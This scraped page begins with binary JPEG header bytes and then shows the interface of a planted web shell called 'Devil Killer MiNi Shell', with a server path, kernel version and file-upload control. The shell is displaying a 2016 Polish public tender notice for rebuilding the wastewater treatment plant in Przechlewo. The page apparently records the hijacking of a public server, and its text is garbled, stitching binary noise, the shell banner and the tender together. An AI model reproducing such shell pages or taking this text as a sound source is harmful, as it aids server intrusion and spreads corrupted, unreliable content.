JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161216/368581-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.przechlewo.biuletyn.net/?bip=1&cid=97' target='_blank'>http://www.przechlewo.biuletyn.net/?bip=1&cid=97</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 368581 - 2016
              z dnia 2016-12-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Przechlewo: Budowa, przebudowa i rozbudowa Komunalnej Oczyszczalni Ścieków w Przechlewie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program Operacyjny Infrastruktura i Środowisko na lata 2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Gospodarki Komunalnej, krajowy numer identyfikacyjny
              533229600000, ul.
              ul. Człuchowska 
              26,
              77320  
              Przechlewo, woj.
              pomorskie, państwo
              Polska, tel.
              598 334 301, e-mail
              zgk@przechlewo.pl, faks
              598 334 631.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.przechlewo.biuletyn.net/?bip=1&amp;cid=97</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty wraz z załącznikami muszą być sporządzone w języku polskim, z zachowaniem formy pisemnej, pod rygorem neważności.<br />
                Adres:
                <br />Gmina Przechlewo - Zakład Gospodarki Komunalnej w Przechewie, ul. Człuchowska 26, 77-320 Przechlewo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa, przebudowa i rozbudowa Komunalnej Oczyszczalni Ścieków w Przechlewie<br /><b>Numer referencyjny: </b>ZGK.ZP.271.1.1.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest Budowa, przebudowa i rozbudowa Komunalnej Oczyszczalni Ścieków w Przechlewie:
2.	Przewidziany zakres rzeczowy robót:
Roboty rozbiórkowe, konstrukcyjno  budowlane, technologiczne, instalacyjne, drogowe, oraz elektryczno- automatyczne.  Zadania w ujęciu ogólnym  obejmują:

Projektowane  obiekty do wykonania.
- przepompownia ścieków ogólnych
- stacja zlewcza ścieków
- zbiornik retencyjny ścieków ogólnych
- oczyszczalnia mechaniczna
- osadnik wtórny
- przepompownia recyrkulacyjna
- stacja odwadniania i higienizacji osadu
- wiata technologiczna osadu
- stacja dmuchaw
- zbiornik wody technologicznej
- komora pomiarowa
- punkt poboru ścieków oczyszczonych
Obiekty istniejące do rozbiórki
- reaktor biologiczny 1  podlegający całkowitej rozbiórce
- reaktor biologiczny 2  podlegający całkowitej rozbiórce
- reaktor biologiczny 3  podlegający całkowitej rozbiórce
- piaskownik odśrodkowy  podlegający całkowitej rozbiórce
- komora pomiarowa ścieków  podlegająca całkowitej rozbiórce
- silos wapna  podlegający całkowitej rozbiórce
- ogrodzenie  podlegające całkowitej rozbiórce
- instalacje podziemne i naziemne podlegające rozbiórce określonej w projektach branżowych 
- oświetlenie zewnętrzne  podlegające rozbiórce określonej w projektach branżowych
- wewnętrzne tereny utwardzone  podlegające częściowej rozbiórce określonej w projektach branżowych
Obiekty adaptowane
- stanowisko krat wstępnych  adaptacja
- przepompownia ścieków nadmiarowych i oczyszczonych mechanicznie  adaptacja
- oczyszczalnia mechaniczna  urządzenie nowe, umieszczone w ist. budynku
- stacja odwadniania i higienizacji osadu  urządzenie nowe umieszczone w ist. budynku
- stacja dozowania reagentów  obiekt istniejący + remont
Reaktor Biologiczny
- komora predenitryfikacji  adaptacja
- komora defosfatacji  adaptacja
- komora denitryfikacji  2 szt. adaptacja
- komora nitryfikacji  2 szt. adaptacja
- wylot do odbiornika
- komora stabilizacji tlenowej osadu nadmiernego  adaptacja istn. osadnika wtórnego
Obiekty istniejące
- zbiornik PIXu
Infrastruktura techniczna
- kanalizacja sanitarna
- wodociąg
- rurociągi technologiczne
- sieć energetyczna i automatyka
- telekomunikacja
- drogi i place wewnętrzne

Skrócony opis przebiegu procesów oczyszczania ścieków:
Modernizowana i przebudowywana oczyszczalnia ścieków, zlokalizowana jest w miejscowości Przechlewo na działkach o nr ewidencyjnym 65/5 i 65/6. Do oczyszczalni doprowadzone są ścieki bytowo-gospodarcze oraz przemysłowe. Dostarczane kolektorami sanitarnymi oraz beczkowozami. 
Ścieki przepływały będą przez stanowisko krat wstępnych. Nastąpi tu automatyczne usuwanie skratek. Wydzielone skratki zrzucane będą do komory zasypowej a w dalszym etapie:                       płukane, transportowane i odwadniane. Do płukania skratek zastosowana będzie woda technologiczna, która w dalszym etapie, odprowadzana będzie do oczyszczalni. Po mechanicznym oczyszczeniu, ścieki będą kierowane do komory czerpnej ścieków. Z komory czerpnej, ścieki za pomocą pomp będą tłoczone do zblokowanej oczyszczalni. Ścieki nadmiarowe grawitacyjnie przepływać będą do komory czerpnej ścieków nadmiarowych. Ścieki z komory czerpnej przepompowni ścieków ogólnych kierowane będą do zblokowanego urządzenia mechanicznego oczyszczania ścieków- nastąpi tam wydzielanie skratek, piasku, tłuszczu. Pulpa piaskowa kierowana będzie do płuczki piasku, gdzie nastąpi wydzielenie z pulpy, części organicznej. Płukanie za pomocą wody technologicznej. Proces mechanicznego oczyszczania sterowany będzie z szaf sterowniczych. Stacja mechanicznego oczyszczania ścieków, wyposażona będzie w pomost obsługowy oraz obejście awaryjne z kratą ręczną umożliwiające wykonanie prac konserwacyjno  remontowych zblokowanej oczyszczalni mechanicznej. Ścieki po oczyszczeniu mechanicznym przepływać będą do komory czerpnej ścieków oczyszczonych, wydzielonej w przepompowni ścieków nadmiarowych i oczyszczonych mechanicznie. Dalej ścieki tłoczone będą do reaktora biologicznego w istniejącym zbiorniku prefabrykowanym. Reaktor biologiczny składał się będzie z następujących po sobie: komory predenitryfikacji, komory defosfatacji, komór denitryfikacji (2 szt.), komór nitryfikacji (2 szt.) oraz współpracował będzie z osadnikami wtórnymi. Na początku reaktora biologicznego umieszczona zostanie komora predenitryfikacji. Do komory tej tłoczona będzie część ścieków surowych oczyszczonych mechanicznie i osad recyrkulowany z osadników wtórnych. Pozostała część ścieków kierowana będzie do komory beztlenowej  defosfatacji. Z komory beztlenowej  defosfatacji mieszanina ścieków i osadu czynnego przepływać będzie do komory niedotlenionej  denitryfikacji.
Kolejny proces  tlenowy, przebiegać będzie w komorze tlenowej  nitryfikacji. W komorze tlenowej zamontowany zostanie system napowietrzania ścieków sprężonym powietrzem z zastosowaniem dyfuzorów membranowych. Sprężone powietrze dostarczane będzie do dyfuzorów zamontowanych w komorze tlenowej ze stacji dmuchaw wyposażonej w dmuchawy napowietrzające. Oczyszczone ścieki poprzez komorę z przelewem pilastym, kierowane będą rurociągiem do osadnika wtórnego. Osadniki zaopatrzone zostaną w zgarniacz osadu oraz koryto odpływowe z przelewem pilastym. W osadniku następuje ostatni etap oczyszczania polegający na oddzieleniu kłaczków osadu od ścieku oczyszczonego. Osad sedymentuje na dno osadnika, a sklarowane ścieki odpływają poprzez koryto do odbiornika ścieków. Osad gromadzący się w części osadowej osadnika wtórnego za pomocą pompy, recyrkulowany będzie do komory predenitryfikacji. 
Powstający w trakcie biologicznego oczyszczania osad nadmierny odprowadzany będzie do komory stabilizacji osadu. Zagęszczony i ustabilizowany tlenowo osad nadmierny kierowany będzie do stacji odwadniania i higienizacji osadu. Osad odwadniany będzie przy użyciu prasy ślimakowej współpracującej ze stacją dozowania i przygotowania polielektrolitu. 
Ścieki dowożone do oczyszczalni zrzucane będą poprzez kontenerową stację zlewczą wyposażoną              w układ kontrolno  pomiarowy oraz kratę wstępną. 
Po zrzucie ścieków, kierowane zostaną one po otwarciu zasuwy z napędem pneumatycznym na kratę wstępną. Ścieki nadmiarowe z komory czerpnej przepompowni ścieków kierowane będą do zbiornika retencyjnego ścieków ogólnych. Zbiornik retencyjny rozładowywany będzie przy użyciu zasuwy z napędem elektrycznym i przepływomierzem. 
Oczyszczalnia ścieków wyposażona zostanie także w stację dozowania reagentów. w zbiornik magazynowy i pompy dozujące. 
Centralny punkt sterowania pracą oczyszczalni ścieków zlokalizowany będzie w sterowni znajdującej się w budynku socjalnym. Do komputera doprowadzone zostaną sygnały z poszczególnych szaf sterowniczych zlokalizowanych na terenie oczyszczalni. 
Oczyszczalnia ścieków wyposażona zostanie w system zasuw i obejść awaryjnych, umożliwiających zapewnienie stabilnej pracy obiektu w przypadkach szczególnych. W celu zapewnienia stabilnej pracy obiektu, obiekt wyposażony zostanie w automatyczny agregat prądotwórczy. Zakłada się wykonanie dwóch niezależnych ciągów technologicznych, co znacznie ułatwi planowanie i wykonanie prac konserwacyjno  remontowych poszczególnych obiektów oczyszczalni. 

- Układ przyjęcia i transportu ścieków będzie posiadał funkcję, polegającą na wstępnym oczyszczaniu mechanicznym ścieków oraz tłoczeniu ich do dalszych faz oczyszczania.
- Kraty wstępne umieszczone zostaną w istniejącym budynku krat i separatora, zakłada się przebudowę istniejącego kanału do wymiarów umożliwiających montaż projektowanych krat. Projektuje się zainstalowanie urządzenie do automatycznego usuwania skratek ze ścieków. Krata pracuje na zasadzie kraty grzebieniowej. Wydzielone na kracie skratki poddawane będą procesowi płukania i prasowania. W tym celu projektuje się zainstalowanie prasopłuczki skratek. 
- Przepompownia ścieków wykonana będzie jako zagłębiona studnia żelbetowa, z pompami zatapialnymi ścieków surowych. 
- Przepompownia ścieków nadmiarowych i oczyszczonych mechanicznie wykonana zostanie                       w istniejącej przepompowni ścieków, wykonana w formie żelbetowej prefabrykowanej w kształcie elipsy. Przepompownia w związku z pełnieniem dwóch funkcji, posiadać musi przegrodę. W przepompowni zainstalowane będą pompy zatapialne ścieków. 
- W celu przyjmowania ścieków dowożonych projektuje się stacje zlewczą. Stacja z pełną kontrolą oraz rejestracją wyników. 
- Zbiornik retencyjny ścieków ogólnych wykonany w konstrukcji żelbetowej, częściowo zagłębiony. Zadaniem zbiornika będzie retencjonowanie ścieków nadmiarowych dopływających do oczyszczalni w godzinach zwiększonego napływu oraz w trakcie opadów. 
- Zblokowana oczyszczalnia mechaniczna  umieszczona w istniejącym budynku technicznym. Zadaniem oczyszczalni mechanicznej będzie wydzielanie ze ścieków tłuszczu, skratek i piasku. 
W jej skład wchodzą;
a)	Urządzenie cedzące  sito bębnowe
b)	Piaskownik poziomy  wirowy zintegrowany ze zbiornikiem sita.
c)	Zintegrowana płuczka piasku 
d)	Szafa zasilająco-sterownicza
- Do biologicznego oczyszczania ścieków projektuje się reaktor biologiczny oparty o metodę niskoobciążonego osadu czynnego w systemie przepływowym. W skład reaktora biologicznego wchodzić będą obiekty:
a) Komora predenitryfikacji
b) Komora defosfatacji
c) Komora denitryfikacji (2 szt.)
d) Komora nitryfikacji (2 szt.)
e) Osadnik wtórny (2 szt.) 
f) Przepompownia recyrkulacyjna 
- W celu zapewnienia gospodarki osadem nadmiernym projekt zakłada: stabilizację tlenową, zagęszczanie, odwadnianie, higienizację i magazynowanie osadu odwodnionego. W skład węzła gospodarki osadowej wchodzą: 
a) Komora stabilizacji tlenowej osadu nadmiernego
b) Stacja odwadniania i higienizacji osadu wyposażona w : Pompę osadu uwodnionego, przepływomierz do pomiaru ilości osadu, przepływomierz do pomiaru ilości polielektrolitu, urządzenie do dawkowania i wymieszania polielektrolitu z osadem, reaktor flokulacji, prasa odwadniająca ślimakowa, sprężarka, stacja przygotowania polielektrolitu, pompa koncentratu polielektrolitu, pompa dozująca flokulant, przenośnik osadu odwodnionego, pompa podnosząca ciśnienie wody płuczącej, urządzenie do minihigienizacji, szafa sterownicza.
c) W celu umożliwienia czasowego składowania odwodnionego osadu, należy wykonać zadaszony plac osadu zgodnie z projektem konstrukcyjnym  4 szt.
- Obiekty towarzyszące 
a) Stacja dmuchaw
b) Stacja dozowania reagentów
c) Zbiornik wody technologicznej
d) Komora pomiarowa ścieków
e) Punkt poboru ścieków oczyszczonych
f) Wylot do odbiornika

Jakość ścieków oczyszczonych po modernizacji oraz ilości: 
Zgodnie z rozporządzeniem Ministra Środowiska z dnia 16 grudnia 2014 r. (Dz.U.2014, poz. 1800) w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego, stężenia zanieczyszczeń w ściekach oczyszczonych wyniosą maksymalnie : 
Zanieczyszczenia organiczne BZT5  15 g/m3
Zanieczyszczenia organiczne ChZT  125 g/m3
Zawiesina ogólna  35 g/m3
Azot ogólny  15 g/m3
Fosfor ogólny  2 g/m3
Przed dokonaniem zgłoszenia gotowości do ostatecznego odbioru robót, Wykonawca zobowiązany jest do uzyskania w/w parametrów. Powyższe parametry mają zostać potwierdzone w protokole badań ścieków wykonanych przez akredytowane laboratorium. 
Zgodnie z opracowanym bilansem ilościowym ścieków, oczyszczalnia będzie mogła przyjąć następujące ilości ścieków:
Średnio dobowo  2650 m3/d
Max. dobowo  3350 m3/d
Max. godzinowo przed zbiornikiem retencyjnym  255 m3/d
Max. godzinowo po zbiorniku retencyjnym  170 m3/d

3. Sposób budowy z zachowaniem ruchu obiektu
Prace związane z przebudową oczyszczalni ścieków prowadzić należy w sposób zapewniający ciągłe utrzymanie obiektu w ruchu. Harmonogram prac należy sporządzić w oparciu o następujące wytyczne (oznaczenia obiektów zgodnie z Projektem budowlanym, branża: sanitarna i technologia  rys. nr T-02 Plan sytuacyjno-wysokościowy):
I etap
W I etapie budowy należy wykonać następujące prace:
a)  wykonanie prac rozbiórkowych obiektów 1R, 2R, 3R,
b)  przebudowa sieci kanalizacji deszczowej wraz z przełożeniem obiektów 1ZL, 2ZL,
c)  budowa następujących obiektów:
    - zbiornik retencyjny ścieków (ob. nr 5),
    - zbiornik wody technologicznej (ob. nr 10),
    - komora pomiarowa ścieków oczyszczonych (ob. nr 11),
    - kanalizacja ścieków oczyszczonych od studzienki K3 do K1
 Opis przepływu ścieków w etapie I
W tym etapie ścieki przepływać będą poprzez istniejącą kanalizację odpływową i dopływową. Zachowany zostanie istniejący stopień oczyszczania mechanicznego. Po oczyszczeniu mechanicznym ścieki oczyszczane będą w istniejącym reaktorze biologicznym. Sposób eksploatacji zgodnie z obowiązującą instrukcją eksploatacji. Po wykonaniu rurociągu kanalizacji ścieków oczyszczonych należy wykonać tymczasowy odpływ ścieków z istniejącego osadnika do studzienki K3.
II etap
W II etapie należy zrealizować:
a)  budowę następujących obiektów:
    - osadniki wtórne poziome (ob. nr 8),
    - budynek techniczny 2 (ob. nr 9), 
b) wykonanie rurociągów technologicznych umożliwiających realizację eksploatacji osadników       wtórnych wraz z obiektami towarzyszącymi,
c) budowa sieci i instalacji zasilania i AKPiA  w zakresie umożliwiającym rozruch nowo-wybudowanych obiektów technologicznych,
Opis przepływu ścieków w etapie II
W etapie II ścieki surowe przepływały będą przez istniejącą oczyszczalnię mechaniczną i dalej kierowane będą do istniejącego reaktora biologicznego. Z reaktora ścieki skierować należy do wybudowanych osadników wtórnych. Aby proces ten można było zrealizować należy:
a) przeprowadzić rozruch:
    - osadników wtórnych,
    - przepompowni recyrkulacyjnej w zakresie umożliwiającym realizację recyrkulacji                       zewnętrznej do komory predenitryfikacji,
   - dokończyć budowę kolektora ścieków oczyszczonych,
b) dokonać w istniejącym reaktorze biologicznym montażu rurociągów odpływowych do nowych osadników wtórnych. Rurociągi odpływowe należy tymczasowo połączyć z istniejącymi korytami odpływowymi z reaktora do osadnika wtórnego. Po wykonaniu podłączenia przepływ w kierunku istniejącego osadnika należy zaślepić  W celu obniżenia poziomu ścieków w reaktorze należy ścieki równomiernie z reaktora odpompować do istniejącego osadnika wtórnego. W trakcie obniżania poziomu dopływające ścieki surowe kierować do wybudowanego wcześniej zbiornika retencyjnego. W tym celu w przepompowni ścieków należy tymczasowo umieścić pompę ścieków nadmiarowych i wykonać prowizoryczne podłączenie do rurociągu ścieków nadmiarowych.
Eksploatacja tymczasowego ciągu technologicznego realizowana będzie w oparciu o zalecenia grupy rozruchowej wytypowanej z ramienia wykonawcy zgodnie z programem rozruchu. 
III etap 
W etapie III należy wykonać następujące prace:
a) wykonanie prac adaptacyjnych istniejącego osadnika wtórnego na komorę stabilizacji osadu     nadmiernego,
b) wykonanie tymczasowego połączenia odpływu z budynku krat (ob. 1 A) z przepompownią         ścieków oczyszczonych mechanicznie z pominięciem istniejącego piaskownika  
c) rozbiórkę istniejącego piaskownika odśrodkowego ( ob. nr 4R)
d) budowę przepompowni ścieków ogólnych i nadmiarowych (ob. nr 2),
e) wykonanie prac adaptacyjnych w budynku krat wstępnych (ob. nr 1A) 
Opis przepływu ścieków w etapie III
W etapie III ścieki surowe kierowane będą z krat wstępnych do przepompowni ścieków oczyszczonych mechanicznie. Adaptację budynku krat należy prowadzić w sposób zapewniający pracę przynajmniej jednej kraty w trakcie trwania adaptacji, stąd istnieje konieczność etapowego wykonywania rozruchu poszczególnych urządzeń.  Oczyszczone mechanicznie ścieki tłoczone będą do wykonanej wcześniej komory stabilizacji osadu, która w tym etapie pełnić będzie rolę tymczasowego reaktora biologicznego. W tym celu należy:
- skierować ścieki surowe i recyrkulację zewnętrzną do komory stabilizacji poprzez wykonanie tymczasowych rurociągów  250, długość ok 2 x 15 mb + 8 kolan,
- przeprowadzić rozruch stacji dmuchaw, instalacji napowietrzającej i mieszającej komory stabilizacji osadu,
- wykonać tymczasowy układ tłoczenia ścieków z tymczasowego reaktora biologicznego do osadników wtórnych. W tym celu należy przewidzieć wynajem dwóch pomp zatapialnych ze sterowaniem na okres ok 30 dni i wykonać dwa tymczasowe rurociągi o średnicy  200, dlugość 2 x ok 30 mb + 8 kolan,
- eksploatacja tymczasowego ciągu technologicznego realizowana będzie w oparciu o zalecenia grupy rozruchowej wytypowanej z ramienia Wykonawcy. 
Osad nadmierny z tymczasowego reaktora biologicznego kierowany będzie bezpośrednio do istniejącej stacji odwadniania osadu. 
IV etap
W etapie IV  należy wykonać następujące prace:
a) wyłączenie z eksploatacji istniejącego reaktora ( ob. nr 7A) i wykonanie prac adaptacyjno-remontowych. Zgromadzony na dnie reaktora osad (ok. 300 m3 ). Należy kierować do istniejącej stacji odwadniania osadu przy użyciu przenośnej pompy zatapialnej i przewodu elastycznego np: strażackiego),
b) prace adaptacyjne w budynku technicznym nr 1 (ob. nr 3A),
c) rozruch przepompowni ścieków ogólnych i nadmiarowych (ob. nr 2), oczyszczalni         mechanicznej i prasy (urządzenia zainstalowane w ob. nr 3A) oraz reaktora biologicznego (ob. nr 7A),
d) prace adaptacyjne w przepompowni ścieków oczyszczonych mechanicznie (ob. nr 4A)
Opis przepływu ścieków w etapie IV
